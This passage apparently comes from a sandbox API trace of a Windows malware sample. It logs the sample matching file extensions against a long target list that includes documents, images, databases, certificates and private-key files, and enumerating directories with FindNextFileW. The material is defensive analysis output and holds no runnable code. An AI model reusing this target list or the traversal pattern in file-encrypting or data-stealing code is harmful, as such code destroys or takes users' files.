lpString2=".xml") returned -1 [0287.539] lstrlenW (lpString=".asc") returned 4 [0287.539] lstrcmpiW (lpString1=".asc", lpString2=".xml") returned -1 [0287.539] lstrlenW (lpString=".ascx") returned 5 [0287.539] lstrcmpiW (lpString1=".ascx", lpString2="s.xml") returned -1 [0287.539] lstrlenW (lpString=".asm") returned 4 [0287.539] lstrcmpiW (lpString1=".asm", lpString2=".xml") returned -1 [0287.539] lstrlenW (lpString=".asmx") returned 5 [0287.539] lstrcmpiW (lpString1=".asmx", lpString2="s.xml") returned -1 [0287.539] lstrlenW (lpString=".asp") returned 4 [0287.539] lstrcmpiW (lpString1=".asp", lpString2=".xml") returned -1 [0287.539] lstrlenW (lpString=".aspx") returned 5 [0287.539] lstrcmpiW (lpString1=".aspx", lpString2="s.xml") returned -1 [0287.539] lstrlenW (lpString=".asr") returned 4 [0287.539] lstrcmpiW (lpString1=".asr", lpString2=".xml") returned -1 [0287.539] lstrlenW (lpString=".asx") returned 4 [0287.539] lstrcmpiW (lpString1=".asx", lpString2=".xml") returned -1 [0287.575] lstrlenW (lpString=".avi") returned 4 [0287.575] lstrcmpiW (lpString1=".avi", lpString2=".xml") returned -1 [0287.575] lstrlenW (lpString=".avs") returned 4 [0287.575] lstrcmpiW (lpString1=".avs", lpString2=".xml") returned -1 [0287.575] lstrlenW (lpString=".backup") returned 7 [0287.575] lstrcmpiW (lpString1=".backup", lpString2="chs.xml") returned -1 [0287.575] lstrlenW (lpString=".bak") returned 4 [0287.575] lstrcmpiW (lpString1=".bak", lpString2=".xml") returned -1 [0287.575] lstrlenW (lpString=".bay") returned 4 [0287.575] lstrcmpiW (lpString1=".bay", lpString2=".xml") returned -1 [0287.576] lstrlenW (lpString=".bd") returned 3 [0287.576] lstrcmpiW (lpString1=".bd", lpString2="xml") returned -1 [0287.576] lstrlenW (lpString=".bin") returned 4 [0287.576] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0287.576] lstrlenW (lpString=".bmp") returned 4 [0287.576] lstrcmpiW (lpString1=".bmp", lpString2=".xml") returned -1 [0287.576] lstrlenW (lpString=".bz2") returned 4 [0287.576] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0287.576] lstrlenW (lpString=".c") returned 2 [0287.576] lstrcmpiW (lpString1=".c", lpString2="ml") returned -1 [0287.576] lstrlenW (lpString=".cdr") returned 4 [0287.576] lstrcmpiW (lpString1=".cdr", lpString2=".xml") returned -1 [0287.576] lstrlenW (lpString=".cer") returned 4 [0287.576] lstrcmpiW (lpString1=".cer", lpString2=".xml") returned -1 [0287.576] lstrlenW (lpString=".cf") returned 3 [0287.576] lstrcmpiW (lpString1=".cf", lpString2="xml") returned -1 [0287.576] lstrlenW (lpString=".cfc") returned 4 [0287.576] lstrcmpiW (lpString1=".cfc", lpString2=".xml") returned -1 [0287.576] lstrlenW (lpString=".cfm") returned 4 [0287.576] lstrcmpiW (lpString1=".cfm", lpString2=".xml") returned -1 [0287.576] lstrlenW (lpString=".cfml") returned 5 [0287.576] lstrcmpiW (lpString1=".cfml", lpString2="s.xml") returned -1 [0287.576] lstrlenW (lpString=".cfu") returned 4 [0287.576] lstrcmpiW (lpString1=".cfu", lpString2=".xml") returned -1 [0287.576] lstrlenW (lpString=".chm") returned 4 [0287.576] lstrcmpiW (lpString1=".chm", lpString2=".xml") returned -1 [0287.576] lstrlenW (lpString=".cin") returned 4 [0287.576] lstrcmpiW (lpString1=".cin", lpString2=".xml") returned -1 [0287.577] lstrlenW (lpString=".class") returned 6 [0287.577] lstrcmpiW (lpString1=".class", lpString2="hs.xml") returned -1 [0287.577] lstrlenW (lpString=".clx") returned 4 [0287.577] lstrcmpiW (lpString1=".clx", lpString2=".xml") returned -1 [0287.577] lstrlenW (lpString=".config") returned 7 [0287.577] lstrcmpiW (lpString1=".config", lpString2="chs.xml") returned -1 [0287.577] lstrlenW (lpString=".cpp") returned 4 [0287.577] lstrcmpiW (lpString1=".cpp", lpString2=".xml") returned -1 [0287.577] lstrlenW (lpString=".cr2") returned 4 [0287.577] lstrcmpiW (lpString1=".cr2", lpString2=".xml") returned -1 [0287.577] lstrlenW (lpString=".crt") returned 4 [0287.577] lstrcmpiW (lpString1=".crt", lpString2=".xml") returned -1 [0287.577] lstrlenW (lpString=".crw") returned 4 [0287.577] lstrcmpiW (lpString1=".crw", lpString2=".xml") returned -1 [0287.577] lstrlenW (lpString=".cs") returned 3 [0287.577] lstrcmpiW (lpString1=".cs", lpString2="xml") returned -1 [0287.577] lstrlenW (lpString=".css") returned 4 [0287.577] lstrcmpiW (lpString1=".css", lpString2=".xml") returned -1 [0287.577] lstrlenW (lpString=".csv") returned 4 [0287.577] lstrcmpiW (lpString1=".csv", lpString2=".xml") returned -1 [0287.577] lstrlenW (lpString=".cub") returned 4 [0287.577] lstrcmpiW (lpString1=".cub", lpString2=".xml") returned -1 [0287.577] lstrlenW (lpString=".dae") returned 4 [0287.577] lstrcmpiW (lpString1=".dae", lpString2=".xml") returned -1 [0287.577] lstrlenW (lpString=".dat") returned 4 [0287.577] lstrcmpiW (lpString1=".dat", lpString2=".xml") returned -1 [0287.577] lstrlenW (lpString=".db") returned 3 [0287.577] lstrcmpiW (lpString1=".db", lpString2="xml") returned -1 [0287.577] lstrlenW (lpString=".dbf") returned 4 [0287.578] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0287.578] lstrlenW (lpString=".dbx") returned 4 [0287.578] lstrcmpiW (lpString1=".dbx", lpString2=".xml") returned -1 [0287.578] lstrlenW (lpString=".dc3") returned 4 [0287.578] lstrcmpiW (lpString1=".dc3", lpString2=".xml") returned -1 [0287.578] lstrlenW (lpString=".dcm") returned 4 [0287.578] lstrcmpiW (lpString1=".dcm", lpString2=".xml") returned -1 [0287.578] lstrlenW (lpString=".dcr") returned 4 [0287.578] lstrcmpiW (lpString1=".dcr", lpString2=".xml") returned -1 [0287.578] lstrlenW (lpString=".der") returned 4 [0287.578] lstrcmpiW (lpString1=".der", lpString2=".xml") returned -1 [0287.578] lstrlenW (lpString=".dib") returned 4 [0287.578] lstrcmpiW (lpString1=".dib", lpString2=".xml") returned -1 [0287.578] lstrlenW (lpString=".dic") returned 4 [0287.578] lstrcmpiW (lpString1=".dic", lpString2=".xml") returned -1 [0287.578] lstrlenW (lpString=".dif") returned 4 [0287.578] lstrcmpiW (lpString1=".dif", lpString2=".xml") returned -1 [0287.578] lstrlenW (lpString=".divx") returned 5 [0287.578] lstrcmpiW (lpString1=".divx", lpString2="s.xml") returned -1 [0287.578] lstrlenW (lpString=".djvu") returned 5 [0287.578] lstrcmpiW (lpString1=".djvu", lpString2="s.xml") returned -1 [0287.578] lstrlenW (lpString=".dng") returned 4 [0287.578] lstrcmpiW (lpString1=".dng", lpString2=".xml") returned -1 [0287.578] lstrlenW (lpString=".doc") returned 4 [0287.578] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0287.578] lstrlenW (lpString=".docm") returned 5 [0287.578] lstrcmpiW (lpString1=".docm", lpString2="s.xml") returned -1 [0287.578] lstrlenW (lpString=".docx") returned 5 [0287.578] lstrcmpiW (lpString1=".docx", lpString2="s.xml") returned -1 [0287.579] lstrlenW (lpString=".dot") returned 4 [0287.579] lstrcmpiW (lpString1=".dot", lpString2=".xml") returned -1 [0287.579] lstrlenW (lpString=".dotm") returned 5 [0287.579] lstrcmpiW (lpString1=".dotm", lpString2="s.xml") returned -1 [0287.579] lstrlenW (lpString=".dotx") returned 5 [0287.579] lstrcmpiW (lpString1=".dotx", lpString2="s.xml") returned -1 [0287.579] lstrlenW (lpString=".dpx") returned 4 [0287.579] lstrcmpiW (lpString1=".dpx", lpString2=".xml") returned -1 [0287.579] lstrlenW (lpString=".dqy") returned 4 [0287.579] lstrcmpiW (lpString1=".dqy", lpString2=".xml") returned -1 [0287.579] lstrlenW (lpString=".dsn") returned 4 [0287.579] lstrcmpiW (lpString1=".dsn", lpString2=".xml") returned -1 [0287.579] lstrlenW (lpString=".dt") returned 3 [0287.579] lstrcmpiW (lpString1=".dt", lpString2="xml") returned -1 [0287.579] lstrlenW (lpString=".dtd") returned 4 [0287.579] lstrcmpiW (lpString1=".dtd", lpString2=".xml") returned -1 [0287.579] lstrlenW (lpString=".dwg") returned 4 [0287.579] lstrcmpiW (lpString1=".dwg", lpString2=".xml") returned -1 [0287.579] lstrlenW (lpString=".dwt") returned 4 [0287.579] lstrcmpiW (lpString1=".dwt", lpString2=".xml") returned -1 [0287.579] lstrlenW (lpString=".dx") returned 3 [0287.579] lstrcmpiW (lpString1=".dx", lpString2="xml") returned -1 [0287.579] lstrlenW (lpString=".dxf") returned 4 [0287.579] lstrcmpiW (lpString1=".dxf", lpString2=".xml") returned -1 [0287.579] lstrlenW (lpString=".edml") returned 5 [0287.579] lstrcmpiW (lpString1=".edml", lpString2="s.xml") returned -1 [0287.579] lstrlenW (lpString=".efd") returned 4 [0287.579] lstrcmpiW (lpString1=".efd", lpString2=".xml") returned -1 [0287.579] lstrlenW (lpString=".elf") returned 4 [0287.580] lstrcmpiW (lpString1=".elf", lpString2=".xml") returned -1 [0287.580] lstrlenW (lpString=".emf") returned 4 [0287.580] lstrcmpiW (lpString1=".emf", lpString2=".xml") returned -1 [0287.580] lstrlenW (lpString=".emz") returned 4 [0287.580] lstrcmpiW (lpString1=".emz", lpString2=".xml") returned -1 [0287.580] lstrlenW (lpString=".epf") returned 4 [0287.580] lstrcmpiW (lpString1=".epf", lpString2=".xml") returned -1 [0287.580] lstrlenW (lpString=".eps") returned 4 [0287.580] lstrcmpiW (lpString1=".eps", lpString2=".xml") returned -1 [0287.580] lstrlenW (lpString=".epsf") returned 5 [0287.580] lstrcmpiW (lpString1=".epsf", lpString2="s.xml") returned -1 [0287.580] lstrlenW (lpString=".epsp") returned 5 [0287.580] lstrcmpiW (lpString1=".epsp", lpString2="s.xml") returned -1 [0287.580] lstrlenW (lpString=".erf") returned 4 [0287.580] lstrcmpiW (lpString1=".erf", lpString2=".xml") returned -1 [0287.580] lstrlenW (lpString=".exr") returned 4 [0287.580] lstrcmpiW (lpString1=".exr", lpString2=".xml") returned -1 [0287.580] lstrlenW (lpString=".f4v") returned 4 [0287.580] lstrcmpiW (lpString1=".f4v", lpString2=".xml") returned -1 [0287.580] lstrlenW (lpString=".fido") returned 5 [0287.580] lstrcmpiW (lpString1=".fido", lpString2="s.xml") returned -1 [0287.580] lstrlenW (lpString=".flm") returned 4 [0287.580] lstrcmpiW (lpString1=".flm", lpString2=".xml") returned -1 [0287.580] lstrlenW (lpString=".flv") returned 4 [0287.580] lstrcmpiW (lpString1=".flv", lpString2=".xml") returned -1 [0287.580] lstrlenW (lpString=".frm") returned 4 [0287.580] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0287.580] lstrlenW (lpString=".fxg") returned 4 [0287.581] lstrcmpiW (lpString1=".fxg", lpString2=".xml") returned -1 [0287.581] lstrlenW (lpString=".geo") returned 4 [0287.581] lstrcmpiW (lpString1=".geo", lpString2=".xml") returned -1 [0287.581] lstrlenW (lpString=".gif") returned 4 [0287.581] lstrcmpiW (lpString1=".gif", lpString2=".xml") returned -1 [0287.581] lstrlenW (lpString=".grs") returned 4 [0287.581] lstrcmpiW (lpString1=".grs", lpString2=".xml") returned -1 [0287.581] lstrlenW (lpString=".gz") returned 3 [0287.581] lstrcmpiW (lpString1=".gz", lpString2="xml") returned -1 [0287.581] lstrlenW (lpString=".h") returned 2 [0287.581] lstrcmpiW (lpString1=".h", lpString2="ml") returned -1 [0287.581] lstrlenW (lpString=".hdr") returned 4 [0287.581] lstrcmpiW (lpString1=".hdr", lpString2=".xml") returned -1 [0287.581] lstrlenW (lpString=".hpp") returned 4 [0287.581] lstrcmpiW (lpString1=".hpp", lpString2=".xml") returned -1 [0287.581] lstrlenW (lpString=".hta") returned 4 [0287.581] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0287.581] lstrlenW (lpString=".htc") returned 4 [0287.581] lstrcmpiW (lpString1=".htc", lpString2=".xml") returned -1 [0287.581] lstrlenW (lpString=".htm") returned 4 [0287.581] lstrcmpiW (lpString1=".htm", lpString2=".xml") returned -1 [0287.581] lstrlenW (lpString=".html") returned 5 [0287.581] lstrcmpiW (lpString1=".html", lpString2="s.xml") returned -1 [0287.581] lstrlenW (lpString=".icb") returned 4 [0287.581] lstrcmpiW (lpString1=".icb", lpString2=".xml") returned -1 [0287.581] lstrlenW (lpString=".ics") returned 4 [0287.581] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0287.581] lstrlenW (lpString=".iff") returned 4 [0287.581] lstrcmpiW (lpString1=".iff", lpString2=".xml") returned -1 [0287.582] lstrlenW (lpString=".inc") returned 4 [0287.582] lstrcmpiW (lpString1=".inc", lpString2=".xml") returned -1 [0287.582] lstrlenW (lpString=".indd") returned 5 [0287.582] lstrcmpiW (lpString1=".indd", lpString2="s.xml") returned -1 [0287.582] lstrlenW (lpString=".ini") returned 4 [0287.582] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0287.582] lstrlenW (lpString=".iqy") returned 4 [0287.582] lstrcmpiW (lpString1=".iqy", lpString2=".xml") returned -1 [0287.582] lstrlenW (lpString=".j2c") returned 4 [0287.582] lstrcmpiW (lpString1=".j2c", lpString2=".xml") returned -1 [0287.582] lstrlenW (lpString=".j2k") returned 4 [0287.582] lstrcmpiW (lpString1=".j2k", lpString2=".xml") returned -1 [0287.582] lstrlenW (lpString=".java") returned 5 [0287.582] lstrcmpiW (lpString1=".java", lpString2="s.xml") returned -1 [0287.582] lstrlenW (lpString=".jp2") returned 4 [0287.582] lstrcmpiW (lpString1=".jp2", lpString2=".xml") returned -1 [0287.582] lstrlenW (lpString=".jpc") returned 4 [0287.582] lstrcmpiW (lpString1=".jpc", lpString2=".xml") returned -1 [0287.582] lstrlenW (lpString=".jpe") returned 4 [0287.582] lstrcmpiW (lpString1=".jpe", lpString2=".xml") returned -1 [0287.582] lstrlenW (lpString=".jpeg") returned 5 [0287.582] lstrcmpiW (lpString1=".jpeg", lpString2="s.xml") returned -1 [0287.582] lstrlenW (lpString=".jpf") returned 4 [0287.582] lstrcmpiW (lpString1=".jpf", lpString2=".xml") returned -1 [0287.582] lstrlenW (lpString=".jpg") returned 4 [0287.582] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0287.582] lstrlenW (lpString=".jpx") returned 4 [0287.582] lstrcmpiW (lpString1=".jpx", lpString2=".xml") returned -1 [0287.583] lstrlenW (lpString=".js") returned 3 [0287.583] lstrcmpiW (lpString1=".js", lpString2="xml") returned -1 [0287.583] lstrlenW (lpString=".jsf") returned 4 [0287.583] lstrcmpiW (lpString1=".jsf", lpString2=".xml") returned -1 [0287.583] lstrlenW (lpString=".json") returned 5 [0287.583] lstrcmpiW (lpString1=".json", lpString2="s.xml") returned -1 [0287.583] lstrlenW (lpString=".jsp") returned 4 [0287.583] lstrcmpiW (lpString1=".jsp", lpString2=".xml") returned -1 [0287.583] lstrlenW (lpString=".kdc") returned 4 [0287.583] lstrcmpiW (lpString1=".kdc", lpString2=".xml") returned -1 [0287.583] lstrlenW (lpString=".kmz") returned 4 [0287.583] lstrcmpiW (lpString1=".kmz", lpString2=".xml") returned -1 [0287.583] lstrlenW (lpString=".kwm") returned 4 [0287.583] lstrcmpiW (lpString1=".kwm", lpString2=".xml") returned -1 [0287.583] lstrlenW (lpString=".lasso") returned 6 [0287.583] lstrcmpiW (lpString1=".lasso", lpString2="hs.xml") returned -1 [0287.583] lstrlenW (lpString=".lbi") returned 4 [0287.583] lstrcmpiW (lpString1=".lbi", lpString2=".xml") returned -1 [0287.583] lstrlenW (lpString=".lgf") returned 4 [0287.583] lstrcmpiW (lpString1=".lgf", lpString2=".xml") returned -1 [0287.583] lstrlenW (lpString=".lgp") returned 4 [0287.583] lstrcmpiW (lpString1=".lgp", lpString2=".xml") returned -1 [0287.583] lstrlenW (lpString=".log") returned 4 [0287.583] lstrcmpiW (lpString1=".log", lpString2=".xml") returned -1 [0287.583] lstrlenW (lpString=".m1v") returned 4 [0287.583] lstrcmpiW (lpString1=".m1v", lpString2=".xml") returned -1 [0287.583] lstrlenW (lpString=".m4a") returned 4 [0287.583] lstrcmpiW (lpString1=".m4a", lpString2=".xml") returned -1 [0287.584] lstrlenW (lpString=".m4v") returned 4 [0287.584] lstrcmpiW (lpString1=".m4v", lpString2=".xml") returned -1 [0287.584] lstrlenW (lpString=".max") returned 4 [0287.584] lstrcmpiW (lpString1=".max", lpString2=".xml") returned -1 [0287.584] lstrlenW (lpString=".md") returned 3 [0287.584] lstrcmpiW (lpString1=".md", lpString2="xml") returned -1 [0287.584] lstrlenW (lpString=".mda") returned 4 [0287.584] lstrcmpiW (lpString1=".mda", lpString2=".xml") returned -1 [0287.584] lstrlenW (lpString=".mdb") returned 4 [0287.584] lstrcmpiW (lpString1=".mdb", lpString2=".xml") returned -1 [0287.584] lstrlenW (lpString=".mde") returned 4 [0287.584] lstrcmpiW (lpString1=".mde", lpString2=".xml") returned -1 [0287.584] lstrlenW (lpString=".mdf") returned 4 [0287.584] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0287.584] lstrlenW (lpString=".mdw") returned 4 [0287.584] lstrcmpiW (lpString1=".mdw", lpString2=".xml") returned -1 [0287.584] lstrlenW (lpString=".mef") returned 4 [0287.584] lstrcmpiW (lpString1=".mef", lpString2=".xml") returned -1 [0287.584] lstrlenW (lpString=".mft") returned 4 [0287.584] lstrcmpiW (lpString1=".mft", lpString2=".xml") returned -1 [0287.584] lstrlenW (lpString=".mfw") returned 4 [0287.584] lstrcmpiW (lpString1=".mfw", lpString2=".xml") returned -1 [0287.584] lstrlenW (lpString=".mht") returned 4 [0287.584] lstrcmpiW (lpString1=".mht", lpString2=".xml") returned -1 [0287.584] lstrlenW (lpString=".mhtml") returned 6 [0287.584] lstrcmpiW (lpString1=".mhtml", lpString2="hs.xml") returned -1 [0287.584] lstrlenW (lpString=".mka") returned 4 [0287.584] lstrcmpiW (lpString1=".mka", lpString2=".xml") returned -1 [0287.585] lstrlenW (lpString=".mkidx") returned 6 [0287.585] lstrcmpiW (lpString1=".mkidx", lpString2="hs.xml") returned -1 [0287.585] lstrlenW (lpString=".mkv") returned 4 [0287.585] lstrcmpiW (lpString1=".mkv", lpString2=".xml") returned -1 [0287.585] lstrlenW (lpString=".mos") returned 4 [0287.585] lstrcmpiW (lpString1=".mos", lpString2=".xml") returned -1 [0287.585] lstrlenW (lpString=".mov") returned 4 [0287.585] lstrcmpiW (lpString1=".mov", lpString2=".xml") returned -1 [0287.585] lstrlenW (lpString=".mp3") returned 4 [0287.585] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0287.585] lstrlenW (lpString=".mp4") returned 4 [0287.585] lstrcmpiW (lpString1=".mp4", lpString2=".xml") returned -1 [0287.585] lstrlenW (lpString=".mpeg") returned 5 [0287.585] lstrcmpiW (lpString1=".mpeg", lpString2="s.xml") returned -1 [0287.585] lstrlenW (lpString=".mpg") returned 4 [0287.585] lstrcmpiW (lpString1=".mpg", lpString2=".xml") returned -1 [0287.585] lstrlenW (lpString=".mpv") returned 4 [0287.585] lstrcmpiW (lpString1=".mpv", lpString2=".xml") returned -1 [0287.585] lstrlenW (lpString=".mrw") returned 4 [0287.585] lstrcmpiW (lpString1=".mrw", lpString2=".xml") returned -1 [0287.585] lstrlenW (lpString=".msg") returned 4 [0287.585] lstrcmpiW (lpString1=".msg", lpString2=".xml") returned -1 [0287.585] lstrlenW (lpString=".mxl") returned 4 [0287.585] lstrcmpiW (lpString1=".mxl", lpString2=".xml") returned -1 [0287.585] lstrlenW (lpString=".myd") returned 4 [0287.585] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0287.585] lstrlenW (lpString=".myi") returned 4 [0287.585] lstrcmpiW (lpString1=".myi", lpString2=".xml") returned -1 [0287.586] lstrlenW (lpString=".nef") returned 4 [0287.586] lstrcmpiW (lpString1=".nef", lpString2=".xml") returned -1 [0287.586] lstrlenW (lpString=".nrw") returned 4 [0287.586] lstrcmpiW (lpString1=".nrw", lpString2=".xml") returned -1 [0287.586] lstrlenW (lpString=".obj") returned 4 [0287.586] lstrcmpiW (lpString1=".obj", lpString2=".xml") returned -1 [0287.586] lstrlenW (lpString=".odb") returned 4 [0287.586] lstrcmpiW (lpString1=".odb", lpString2=".xml") returned -1 [0287.586] lstrlenW (lpString=".odc") returned 4 [0287.586] lstrcmpiW (lpString1=".odc", lpString2=".xml") returned -1 [0287.586] lstrlenW (lpString=".odm") returned 4 [0287.586] lstrcmpiW (lpString1=".odm", lpString2=".xml") returned -1 [0287.586] lstrlenW (lpString=".odp") returned 4 [0287.586] lstrcmpiW (lpString1=".odp", lpString2=".xml") returned -1 [0287.586] lstrlenW (lpString=".ods") returned 4 [0287.586] lstrcmpiW (lpString1=".ods", lpString2=".xml") returned -1 [0287.586] lstrlenW (lpString=".oft") returned 4 [0287.586] lstrcmpiW (lpString1=".oft", lpString2=".xml") returned -1 [0287.586] lstrlenW (lpString=".one") returned 4 [0287.586] lstrcmpiW (lpString1=".one", lpString2=".xml") returned -1 [0287.586] lstrlenW (lpString=".onepkg") returned 7 [0287.586] lstrcmpiW (lpString1=".onepkg", lpString2="chs.xml") returned -1 [0287.586] lstrlenW (lpString=".onetoc2") returned 8 [0287.587] lstrcmpiW (lpString1=".onetoc2", lpString2="schs.xml") returned -1 [0287.587] lstrlenW (lpString=".opt") returned 4 [0287.587] lstrcmpiW (lpString1=".opt", lpString2=".xml") returned -1 [0287.587] lstrlenW (lpString=".oqy") returned 4 [0287.587] lstrcmpiW (lpString1=".oqy", lpString2=".xml") returned -1 [0287.587] lstrlenW (lpString=".orf") returned 4 [0287.587] lstrcmpiW (lpString1=".orf", lpString2=".xml") returned -1 [0287.587] lstrlenW (lpString=".p12") returned 4 [0287.587] lstrcmpiW (lpString1=".p12", lpString2=".xml") returned -1 [0287.587] lstrlenW (lpString=".p7b") returned 4 [0287.587] lstrcmpiW (lpString1=".p7b", lpString2=".xml") returned -1 [0287.587] lstrlenW (lpString=".p7c") returned 4 [0287.587] lstrcmpiW (lpString1=".p7c", lpString2=".xml") returned -1 [0287.587] lstrlenW (lpString=".pam") returned 4 [0287.587] lstrcmpiW (lpString1=".pam", lpString2=".xml") returned -1 [0287.587] lstrlenW (lpString=".pbm") returned 4 [0287.587] lstrcmpiW (lpString1=".pbm", lpString2=".xml") returned -1 [0287.587] lstrlenW (lpString=".pct") returned 4 [0287.587] lstrcmpiW (lpString1=".pct", lpString2=".xml") returned -1 [0287.587] lstrlenW (lpString=".pcx") returned 4 [0287.587] lstrcmpiW (lpString1=".pcx", lpString2=".xml") returned -1 [0287.587] lstrlenW (lpString=".pdd") returned 4 [0287.587] lstrcmpiW (lpString1=".pdd", lpString2=".xml") returned -1 [0287.587] lstrlenW (lpString=".pdf") returned 4 [0287.587] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0287.587] lstrlenW (lpString=".pdp") returned 4 [0287.587] lstrcmpiW (lpString1=".pdp", lpString2=".xml") returned -1 [0287.588] lstrlenW (lpString=".pef") returned 4 [0287.588] lstrcmpiW (lpString1=".pef", lpString2=".xml") returned -1 [0287.588] lstrlenW (lpString=".pem") returned 4 [0287.588] lstrcmpiW (lpString1=".pem", lpString2=".xml") returned -1 [0287.588] lstrlenW (lpString=".pff") returned 4 [0287.588] lstrcmpiW (lpString1=".pff", lpString2=".xml") returned -1 [0287.588] lstrlenW (lpString=".pfm") returned 4 [0287.588] lstrcmpiW (lpString1=".pfm", lpString2=".xml") returned -1 [0287.588] lstrlenW (lpString=".pfx") returned 4 [0287.588] lstrcmpiW (lpString1=".pfx", lpString2=".xml") returned -1 [0287.588] lstrlenW (lpString=".pgm") returned 4 [0287.588] lstrcmpiW (lpString1=".pgm", lpString2=".xml") returned -1 [0287.588] lstrlenW (lpString=".php") returned 4 [0287.588] lstrcmpiW (lpString1=".php", lpString2=".xml") returned -1 [0287.588] lstrlenW (lpString=".php3") returned 5 [0287.588] lstrcmpiW (lpString1=".php3", lpString2="s.xml") returned -1 [0287.588] lstrlenW (lpString=".php4") returned 5 [0287.588] lstrcmpiW (lpString1=".php4", lpString2="s.xml") returned -1 [0287.588] lstrlenW (lpString=".php5") returned 5 [0287.588] lstrcmpiW (lpString1=".php5", lpString2="s.xml") returned -1 [0287.588] lstrlenW (lpString=".phtml") returned 6 [0287.588] lstrcmpiW (lpString1=".phtml", lpString2="hs.xml") returned -1 [0287.588] lstrlenW (lpString=".pict") returned 5 [0287.588] lstrcmpiW (lpString1=".pict", lpString2="s.xml") returned -1 [0287.588] lstrlenW (lpString=".pl") returned 3 [0287.588] lstrcmpiW (lpString1=".pl", lpString2="xml") returned -1 [0287.588] lstrlenW (lpString=".pls") returned 4 [0287.588] lstrcmpiW (lpString1=".pls", lpString2=".xml") returned -1 [0287.588] lstrlenW (lpString=".pm") returned 3 [0287.589] lstrcmpiW (lpString1=".pm", lpString2="xml") returned -1 [0287.589] lstrlenW (lpString=".png") returned 4 [0287.589] lstrcmpiW (lpString1=".png", lpString2=".xml") returned -1 [0287.589] lstrlenW (lpString=".pnm") returned 4 [0287.589] lstrcmpiW (lpString1=".pnm", lpString2=".xml") returned -1 [0287.589] lstrlenW (lpString=".pot") returned 4 [0287.589] lstrcmpiW (lpString1=".pot", lpString2=".xml") returned -1 [0287.589] lstrlenW (lpString=".potm") returned 5 [0287.589] lstrcmpiW (lpString1=".potm", lpString2="s.xml") returned -1 [0287.589] lstrlenW (lpString=".potx") returned 5 [0287.589] lstrcmpiW (lpString1=".potx", lpString2="s.xml") returned -1 [0287.589] lstrlenW (lpString=".ppa") returned 4 [0287.589] lstrcmpiW (lpString1=".ppa", lpString2=".xml") returned -1 [0287.589] lstrlenW (lpString=".ppam") returned 5 [0287.589] lstrcmpiW (lpString1=".ppam", lpString2="s.xml") returned -1 [0287.589] lstrlenW (lpString=".ppm") returned 4 [0287.589] lstrcmpiW (lpString1=".ppm", lpString2=".xml") returned -1 [0287.589] lstrlenW (lpString=".pps") returned 4 [0287.589] lstrcmpiW (lpString1=".pps", lpString2=".xml") returned -1 [0287.589] lstrlenW (lpString=".ppsm") returned 5 [0287.589] lstrcmpiW (lpString1=".ppsm", lpString2="s.xml") returned -1 [0287.589] lstrlenW (lpString=".ppt") returned 4 [0287.589] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0287.589] lstrlenW (lpString=".pptm") returned 5 [0287.589] lstrcmpiW (lpString1=".pptm", lpString2="s.xml") returned -1 [0287.589] lstrlenW (lpString=".pptx") returned 5 [0287.589] lstrcmpiW (lpString1=".pptx", lpString2="s.xml") returned -1 [0287.589] lstrlenW (lpString=".prn") returned 4 [0287.590] lstrcmpiW (lpString1=".prn", lpString2=".xml") returned -1 [0287.590] lstrlenW (lpString=".ps") returned 3 [0287.590] lstrcmpiW (lpString1=".ps", lpString2="xml") returned -1 [0287.590] lstrlenW (lpString=".psb") returned 4 [0287.590] lstrcmpiW (lpString1=".psb", lpString2=".xml") returned -1 [0287.590] lstrlenW (lpString=".psd") returned 4 [0287.590] lstrcmpiW (lpString1=".psd", lpString2=".xml") returned -1 [0287.590] lstrlenW (lpString=".pst") returned 4 [0287.590] lstrcmpiW (lpString1=".pst", lpString2=".xml") returned -1 [0287.590] lstrlenW (lpString=".ptx") returned 4 [0287.590] lstrcmpiW (lpString1=".ptx", lpString2=".xml") returned -1 [0287.590] lstrlenW (lpString=".pub") returned 4 [0287.590] lstrcmpiW (lpString1=".pub", lpString2=".xml") returned -1 [0287.590] lstrlenW (lpString=".pwm") returned 4 [0287.590] lstrcmpiW (lpString1=".pwm", lpString2=".xml") returned -1 [0287.590] lstrlenW (lpString=".pxr") returned 4 [0287.590] lstrcmpiW (lpString1=".pxr", lpString2=".xml") returned -1 [0287.590] lstrlenW (lpString=".py") returned 3 [0287.590] lstrcmpiW (lpString1=".py", lpString2="xml") returned -1 [0287.590] lstrlenW (lpString=".qt") returned 3 [0287.590] lstrcmpiW (lpString1=".qt", lpString2="xml") returned -1 [0287.590] lstrlenW (lpString=".r3d") returned 4 [0287.590] lstrcmpiW (lpString1=".r3d", lpString2=".xml") returned -1 [0287.590] lstrlenW (lpString=".raf") returned 4 [0287.590] lstrcmpiW (lpString1=".raf", lpString2=".xml") returned -1 [0287.590] lstrlenW (lpString=".rar") returned 4 [0287.590] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0287.591] lstrlenW (lpString=".raw") returned 4 [0287.591] lstrcmpiW (lpString1=".raw", lpString2=".xml") returned -1 [0287.593] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0287.593] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076a026, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0287.593] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0287.593] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: 